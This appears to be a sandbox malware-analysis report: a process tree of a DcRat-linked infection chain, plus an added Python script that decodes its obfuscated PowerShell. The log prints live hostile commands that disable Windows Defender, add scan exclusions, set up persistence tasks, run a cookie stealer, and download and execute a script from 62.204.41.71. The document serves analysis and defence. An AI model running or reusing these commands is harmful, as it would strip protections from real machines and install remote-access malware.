                    - [11] C:\Windows\SysWOW64\icacls.exe  icacls "C:\Windows\System32\smartscreen.exe" /grant:r Administrators:F /c
                      - Possible privilege escalation attempt
                      - Modifies file permissions
                    - [11] C:\Windows\SysWOW64\taskkill.exe  taskkill /im smartscreen.exe /f
                      - Kills process with taskkill
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyMonitor" /Disable
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Shell\FamilySafetyRefreshTask" /Disable
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                    - [11] C:\Windows\SysWOW64\schtasks.exe  schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                    - [11] C:\Windows\SysWOW64\sc.exe  sc stop WinDefend
                    - [11] C:\Windows\SysWOW64\sc.exe  sc stop WdNisDrv
                    - [11] C:\Windows\SysWOW64\sc.exe  sc stop WdNisSvc
                    - [11] C:\Windows\SysWOW64\sc.exe  sc stop WdFilter
                    - [11] C:\Windows\SysWOW64\sc.exe  sc stop WdBoot
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\reg.exe  reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                    - [11] C:\Windows\SysWOW64\timeout.exe  timeout /t 2
                      - Delays execution with timeout.exe
                    - [11] C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe  Power.exe Regedit.exe /S Offer.reg
                      - [12] C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe  "C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" Regedit.exe /S Offer.reg
                        - [13] C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe  "C:\Users\Admin\AppData\Roaming\OneDrive\Power.exe" /TI/ Regedit.exe /S Offer.reg
                          - [14] C:\Windows\Regedit.exe  "C:\Windows\Regedit.exe" /S Offer.reg
                            - Runs .reg file with regedit
                    - [11] C:\Windows\SysWOW64\reg.exe  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Security and Maintenance" /f
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete SgrmBroker
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete SgrmAgent
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete SecurityHealthService
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete WdBoot
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete WdFiltrer
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete WdNisSvc
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete WdNisDrv
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete wscsvc
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete Sense
                    - [11] C:\Windows\SysWOW64\sc.exe  sc delete WinDefend
                    - [11] C:\Windows\SysWOW64\timeout.exe  timeout /t 2
                      - Delays execution with timeout.exe
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Windows"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath "C:/Users"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -PUAProtection disable"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6"
                    - [11] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  powershell.exe -command "Set-MpPreference -ScanScheduleDay 8"
                    - [11] C:\Users\Admin\AppData\Roaming\OneDrive\Drive.exe  Drive.exe
                      - [12] C:\Windows\SYSTEM32\cmd.exe  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                        - [13] C:\Windows\system32\schtasks.exe  schtasks /create /f /sc onlogon /rl highest /tn "OneDrive" /tr "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                          - DcRat
                          - Creates scheduled task(s)
                      - [12] C:\Windows\SYSTEM32\cmd.exe  "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
                        - [13] C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe  C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
                          - [14] C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe  "C:\Users\Admin\AppData\Roaming\Windows\Telemetry\sihost64.exe"
                          - [14] C:\Windows\System32\conhost.exe  C:\Windows\System32\conhost.exe wjzmhxaceqz0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB7071LQ7krggxA/UnVAaiocMjg0W1H5yAsWgrQR/11zt7RRg3ZnxBodCtMBKiY6+h9La4/jA7nc9BcXwzk8+WkGkxNBMC7OGlDKj9rOiTQ/TOxoHyWdibvyBbcnCZiKPxB8iibCz9eqCXI7CHageLKU6YJPTRFLen1ePs/tUv7hCEAIVa5jfPO/y1Z4uyViDjd5hg2gMd7UuClJ+CBHAOYUVsH8w1ma5UC3dsohG2flQxaKhHOaDpp5ELr7DD/0MGPcTCx4O3hoEDL/m+UtWA6Qj3vGo+MsusQ4bNf46gR3oRP951wrLt7MHk+nkdjBgVoC5qv8B33n5lfVldrIlXKY5U377OV/MbG7Ue/212cYr
                            - [15] C:\Windows\system32\WerFault.exe  C:\Windows\system32\WerFault.exe -u -p 5788 -s 408
                              - Program crash
                    - [11] C:\Windows\SysWOW64\timeout.exe  timeout /t 4
                      - Delays execution with timeout.exe
            - [7] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX
              - Blocklisted process makes network request
              - Adds Run key to start application
              - Suspicious use of AdjustPrivilegeToken
          - [6] C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe  "C:\Users\Admin\Documents\CPH9q07r6cXvJsVI_KM1RiOL.exe"
            - Executes dropped EXE
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 432
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 4900 -s 440
              - Program crash
          - [6] C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe  "C:\Users\Admin\Documents\ZxU30FwtSCAQFKpXqBqFaTKQ.exe"
            - Executes dropped EXE
            - Suspicious use of NtSetInformationThreadHideFromDebugger
            - Suspicious use of AdjustPrivilegeToken
          - [6] C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe  "C:\Users\Admin\Documents\1JL6JbXANF8tluJUl1I2mYPT.exe"
            - Executes dropped EXE
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 432
              - Program crash
            - [7] C:\Windows\SysWOW64\WerFault.exe  C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 452
              - Program crash
          - [6] C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe  "C:\Users\Admin\Documents\3rukoxtBvGYzOvS6XcqPmx7G.exe"
            - Executes dropped EXE
            - Checks computer location settings
            - [7] C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\123\main.bat" /s"
              - [8] C:\Windows\system32\mode.com  mode 65,10
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e file.zip -p320791618516055 -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_9.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_8.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_7.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_6.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_5.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_4.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_3.zip -oextracted
                - Executes dropped EXE
                - Loads dropped DLL
              - [8] C:\Users\Admin\AppData\Local\Temp\123\7z.exe  7z.exe e extracted/file_2.zip -oextracted
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\123\7z.exe7z.exe e extracted/file_1.zip -oextracted8⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\attrib.exeattrib +H "Result_protected.exe"8⤵
- Views/modifies file attributes
-
C:\Users\Admin\AppData\Local\Temp\123\Result_protected.exe"Result_protected.exe"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"9⤵
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /TN Cache-S-21-2946144819-3e21f723 /TR "C:\Users\Admin\AppData\Local\cache\MoUSO.exe"10⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\222.exe"C:\Users\Admin\AppData\Local\Temp\222.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe"C:\Users\Admin\Documents\yAQm8Ifhb_rMkM7EhIDqbE9y.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 4327⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5044 -s 4527⤵
- Program crash
-
C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe"C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\5NhVWerLeg2JkPgGASqWBTL4.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 5NhVWerLeg2JkPgGASqWBTL4.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe"C:\Users\Admin\Documents\yZxudOkIX84Aa9UK20LSQHVH.exe"6⤵
-
C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe"C:\Users\Admin\Documents\PPjZFTHQLVGLf4MI9ZI7vFA6.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 16287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1332 -s 20567⤵
- Program crash
-
C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"6⤵
-
C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"C:\Users\Admin\Documents\KUxPDM3fT73jHaCqN6rtwNRj.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe"C:\Users\Admin\Documents\WTNhKoL9ySsIA_Xeeq7dvJd_.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSB515.tmp\Install.exe.\Install.exe7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSCB8B.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gneIVspRo" /SC once /ST 00:50:46 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- DcRat
- Creates scheduled task(s)
-
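Two of the PowerShell command lines in this tree hide what they actually run. The depth-7 powershell.exe above builds its script from three single-quoted fragments padded with a `{NAN}` placeholder, concatenates them in the order `$c1,$c4,$c3` (deliberately not numeric order), strips the token and hands the result to `IEX`, whose output is piped into a second `IEX`. The one-shot task `gneIVspRo` (and the later `grVdSBQdv` and the top-level powershell.EXE entries) runs `powershell -EncodedCommand`, whose argument is base64 of the UTF-16LE script text. The Python below is an added example for this report, not code from the sample or from the sandbox: it recovers both forms from the command lines as logged. The two inputs are copied from the entries above (the powershell path is shortened); the function names and regular expressions are mine.

```python
"""Recover the real PowerShell behind two command lines logged in the tree above.

Added example for this report (not the sample's or the sandbox's code). The two
inputs are copied from the process tree; function names and regexes are mine.
"""
import base64
import re

# Constructed input: the depth-7 powershell.exe command line, copied from the tree
# (executable path shortened to powershell.exe).
PLACEHOLDER_CMDLINE = (
    "powershell.exe $c1='{NAN}(N{NAN}{NAN}e{NAN}w-{NAN}Ob{NAN}{NAN}je{NAN}{NAN}c{NAN}t N{NAN}{NAN}e{NAN}t.W{NAN}e';"
    "$c4='b{NAN}{NAN}Cli{NAN}{NAN}en{NAN}{NAN}t{NAN}).Do{NAN}{NAN}wn{NAN}{NAN}l{NAN}o';"
    "$c3='a{NAN}dS{NAN}{NAN}t{NAN}ri{NAN}{NAN}n{NAN}g{NAN}(''h{NAN}tt{NAN}p:/{NAN}/62.204.41.71/cs/SkyDrive.oo''){NAN}';"
    "$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('{NAN}',''); IEX $TC |IEX"
)
# Constructed input: the schtasks line that registers task gneIVspRo, copied from the tree.
SCHTASKS_CMDLINE = (
    'schtasks /CREATE /TN "gneIVspRo" /SC once /ST 00:50:46 /F /RU "Admin" /TR '
    '"powershell -WindowStyle Hidden -EncodedCommand '
    'cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="'
)

# $name='literal'   (PowerShell single-quoted string; a doubled '' is an escaped quote)
_SQ_ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^']|'')*)'")
# ($a,$b,$c -Join '')   the order the script really concatenates in ($c1,$c4,$c3 here)
_JOIN = re.compile(r"\(\s*((?:\$\w+\s*,\s*)*\$\w+)\s+-Join\s*''\s*\)", re.IGNORECASE)
# .replace('TOKEN','')   the placeholder stripped after the join
_REPLACE = re.compile(r"\.replace\('([^']+)'\s*,\s*''\)", re.IGNORECASE)
# -EncodedCommand and the unambiguous prefixes PowerShell accepts for it
_ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\")]+")


def deobfuscate_placeholder(cmdline: str) -> str:
    """Mirror the dropper: unescape each literal, concatenate in -Join order,
    then strip the placeholder token. Returns the string handed to IEX."""
    literals = {name: body.replace("''", "'") for name, body in _SQ_ASSIGN.findall(cmdline)}
    join = _JOIN.search(cmdline)
    order = re.findall(r"\$(\w+)", join.group(1)) if join else list(literals)
    joined = "".join(literals.get(name, "") for name in order)
    token = _REPLACE.search(cmdline)
    return joined.replace(token.group(1), "") if token else joined


def decode_encoded_command(cmdline: str) -> str:
    """Decode each -EncodedCommand argument (base64 of UTF-16LE script text)."""
    scripts = []
    for b64 in _ENC_ARG.findall(cmdline):
        try:
            scripts.append(base64.b64decode(b64, validate=True).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not base64 after all (some other -e... switch's argument)
    return "\n".join(scripts)


def extract_urls(text: str) -> list:
    """Pull the stage-2 URLs out of a recovered script."""
    return _URL.findall(text)


if __name__ == "__main__":
    stage2 = deobfuscate_placeholder(PLACEHOLDER_CMDLINE)
    print("IEX input :", stage2)
    print("URLs      :", extract_urls(stage2))
    print("task runs :", decode_encoded_command(SCHTASKS_CMDLINE))
```

The first command line decodes to `(New-Object Net.WebClient).DownloadString('http://62.204.41.71/cs/SkyDrive.oo')`, so `IEX $TC | IEX` fetches a second-stage script from that host and executes it; the signature "Blocklisted process makes network request" on that entry is this download. The scheduled-task payload decodes to `start-process -WindowStyle Hidden gpupdate.exe /force`, a Group Policy refresh, presumably to make the Windows Defender policy keys written by the same installer take effect (the gpupdate.exe child of the top-level powershell.EXE entry below is that refresh). Note that the join order is read from the script rather than assumed, and that PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc), which the regex allows for.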
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gneIVspRo"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gneIVspRo"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe\" j6 /site_id 525403 /S" /V1 /F9⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe"C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\Documents\uowCMbUKdOuQ4Z_MhplAA1pa.exe7⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 08⤵
-
C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe"C:\Users\Admin\Documents\ZcZKv3wUd95iiqEdR8N8GIp7.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_7.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exearnatic_7.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exeC:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_7.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_5.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_5.exearnatic_5.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_4.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_4.exearnatic_4.exe5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_3.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_3.exearnatic_3.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\rUNdlL32.eXe"C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",getmft6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1060 -s 6007⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c arnatic_1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EE2830D\arnatic_1.exearnatic_1.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 10326⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 1060 -ip 10601⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3528 -ip 35281⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\PerfLogs\smss.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sv-SE\dllhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\runonce\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\comuid\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
